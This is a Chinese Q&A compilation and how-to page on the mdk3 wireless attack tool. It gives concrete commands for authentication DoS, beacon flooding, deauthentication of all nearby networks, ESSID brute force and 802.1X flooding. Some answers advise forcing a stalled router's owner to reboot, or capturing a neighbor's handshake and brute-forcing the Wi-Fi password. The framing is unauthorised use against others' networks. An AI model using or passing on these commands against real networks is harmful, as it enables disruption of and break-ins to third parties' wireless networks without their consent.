本文目录一览:
- 1、如何在kali中安装mdk3?
- 2、mdk3 攻击究竟有没有作用?
- 3、mdk3攻击 为什么我用第一次的时候效果挺好的连自己的Wifi都连不上 不过 接下来几天用的时候
- 4、MDK3攻击对已经出现300秒提示的路由是否无效
- 5、mdk3攻击 路由器记录 了 我的mac地址 对我的攻击免疫了 怎么办 换mac地址又换不了
- 6、在linux 下怎么才能用mdk3 这个命令啊 需要安装软件莫??
如何在kali中安装mdk3?
建议到kalilinux官网下载。下载完成之后,如果你需要虚拟机则在电脑上面已经安装好的虚拟机软件里面新建虚拟机配置镜像文件即可。
mdk3 攻击究竟有没有作用?
经过长期使用发现其实mdk3对部分路由有用,有部分路由是防dos攻击的,完全起不
mdk3攻击 为什么我用第一次的时候效果挺好的连自己的Wifi都连不上 不过 接下来几天用的时候
以下几种攻击模式,可以一个个试,看那个模式有用:mdk3 mon0 a -p 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3 mon0 a -d 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3 mon0 a -f 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3 mon0 a -g 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)
MDK3攻击对已经出现300秒提示的路由是否无效
看了你给的链接,不过,我觉得MDK3并不是炒作,它有他的工作原理,我在一楼的就已经说了,试过几个路由,并已经成功了,现在只是在讨论如何应付300秒防pin的路由而已。
mdk3攻击 路由器记录 了 我的mac地址 对我的攻击免疫了 怎么办 换mac地址又换不了
等隔壁有人的时候,看信号后面有客户端连接时,使用截取数据包的方法获取握手包,再暴力破解握手包得到无线密码即可。
这种禁pin的路由器,pin一百年都不会有收获的。
在linux 下怎么才能用mdk3 这个命令啊 需要安装软件莫??
MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能”。
——虽然这几句话被转了N遍,但我们还是以这句话开头;今天就围绕以上提到的几种攻击模式进行简单的折腾下:
首先激活无线网卡至监听模式,然后输入mdk3 --fullhelp查看详细帮助内容
beacon flood mode:
这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
详细命令如下:
mdk3 mon0 b
-n ssid #自定义ESSID
-f filename #读取ESSID列表文件
-v filename #自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a #WPA AES encryption
-m #读取数据库的mac地址
-c chan #自定义信道
-s pps #发包速率
mdk3 --help b #查看详细内容
Authentication DoS:
这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由!
mdk3 mon0 a
-a ap_mac #测试指定BSSID
-m #使用有效数据库中的客户端mac地址
-c #对应 -a ,不检查是否测试成功
-i ap_mac #对指定BSSID进行智能攻击
-s pps #速率,默认50
Deauthentication/Disassociation Amok:
这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!
mdk3 mon0 d
-w filename #白名单mac地址列表文件
-b filename #黑名单mac地址列表文件
-s pps #速率,这个模式下默认无限制
-c [chan,chan,chan,...] #信道,可以多填,如 2,4,5,1
Basic probing and ESSID Bruteforce mode:
基本探测AP信息和ESSID猜解模式
mdk3 mon0 p
-e ssid #待检测的ssid
-f filename #检测AP设置为隐藏的ssid列表文件
-t bssid #用bssid检测AP的信息
-s pps #速率,默认300
-b character set #设置字符集
802.1X tests:
802.1X 协议下的攻击测试
mdk3 mon0 x
0 - EAPOL Start packet flooding #EAPOL格式的报文洪水攻击
-n ssid
-t bssid #目标客户端的mac地址
-w WPA type
Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)
-u unicast cipher
Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
-m multicast cipher
Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
-s pps #速率,默认400
1 - EAPOL Logoff test #注销认证攻击
-t bssid #目标客户端的mac地址
-c bssid #目标ap的合法客户端mac
-s pps #速率,默认400